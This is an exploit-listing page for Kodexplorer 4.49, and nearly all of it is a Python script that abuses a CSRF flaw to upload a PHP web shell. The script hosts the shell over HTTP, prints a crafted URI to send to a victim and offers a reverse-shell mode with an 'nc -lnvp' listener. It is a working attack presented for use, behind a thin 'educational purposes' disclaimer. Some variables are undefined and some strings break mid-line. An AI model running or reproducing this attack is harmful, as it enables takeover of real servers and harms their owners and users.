Kodexplorer 4.49 csrf to arbitrary file upload Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-04-25 |
Type : webapps |
Platform : php
This exploit / vulnerability Kodexplorer 4.49 csrf to arbitrary file upload is for educational purposes only and if it is used you will do on your own risk!
targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
wshell_f = open('http/shell.php', 'w')
wshell_f.write(payload)
wshell_f.close()
print('[*] Opening HTTPd port')
th = threading.Thread(target=httpd)
th.start()
print(f'[+] Send this URI to your target:
{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
{lhost}:8080/shell.php&uuid=&time=')
print(f'[+] After the victim opens the URI, his shell will be hosted at
{url}/data/User/admin/home/shell.php?cmd=whoami')
targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
lport = input('[*] Your local port: ')
reqpayload = requests.get(rvpayload).text
reqpayload = reqpayload.replace('127.0.0.1', lhost)
reqpayload = reqpayload.replace('1234', lport)
wshell_f = open('http/shell.php', 'w')
wshell_f.write(reqpayload)
wshell_f.close()
print('[*] Opening HTTPd port')
th = threading.Thread(target=httpd)
th.start()
print(f'[+] Send this URI to your target:
{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
{lhost}:8080/shell.php&uuid=&time=')
input(f'[*] Run the command "nc -lnvp {lport}" to receive the
connection and press any key\n')
while True:
hitshell = requests.get(f'{url}/data/User/admin/home/shell.php')
sleep(1)
if not hitshell.status_code == 200:
continue
else:
print('[+] Shell sent and executed!')
break
def main(url, lhost, mode):
banner()
if mode == 'webshell':
webshell(url, lhost)
elif mode == 'reverse':
reverseshell(url, lhost)
else:
print('[-] There is no such mode. Use webshell or reverse')